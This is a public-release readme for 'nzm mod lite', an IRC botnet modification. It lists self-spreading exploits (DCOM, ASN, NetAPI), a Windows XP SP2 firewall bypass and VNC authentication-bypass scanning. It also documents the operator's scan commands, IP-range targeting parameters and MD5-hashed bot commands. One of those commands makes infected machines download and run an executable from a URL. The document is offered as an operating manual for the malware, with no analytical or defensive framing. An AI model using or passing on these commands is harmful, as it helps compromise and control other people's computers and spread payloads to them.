--------------------------------
nzm mod lite by D public release
--------------------------------

modifications&addons:
- md5 protection for download, update and remove commands
- windows xp sp2 firewall bypass
- windows xp sp2 tcpip.sys fix
- working dcom, asn and netapi
- vnc authbypass scanner
- new scanning parameters (see below)
- working mass scan

COMMANDS FOR SCAN
default scan:
.advscan <exploit> <threads> <delay> <time> <IP and/or parameters r, b, a, w, y> [parameters l, s]
vnc scan with default wordlist: (removed in this public version - not working)
.advscan vncps <threads> <delay> <time> <IP and/or parameters r, b, a, w, y> [parameters o, l, s]
vnc scan with external wordlist: (removed in this public version - not working)
.advscan vncps <threads> <delay> <time> <IP and/or parameters r, b, a, w, y> <url> <numofpasses> <parameter: v> [parameters o, l, s]
mass scan:
.mass <threads per sploit> <parameters r, b, a, w, y> [parameters l, s]

parameters:
-r = random in C&D class IP
-a = sequential on defined A class IP
-b = sequential on defined A&B class IP
-w = random B class picked, scanning random IPs C&D class
-y = random B class picked, scanning sequential IPs C&D class

-s = silent
-l = if lan IP, join lan channel and dont scan
-v = use external wordlist defined by url (if the wordlist doesnt exists, bot use integrated wordlist) (removed in this public version - not working)
-o = try to root vnc machine if access granted (removed in this public version - not working)

USING HASHED COMMANDS
To reduce cpu usage, you can use hashed commands by first giving command h. Examples:
To remove the bot: .h blabla (use md5checksumtest.exe to generate md5 hash of word "blabla", then put that hash into config and compile)
To download the bot: .h download http//www.com/c.exe c:\c.exe 1

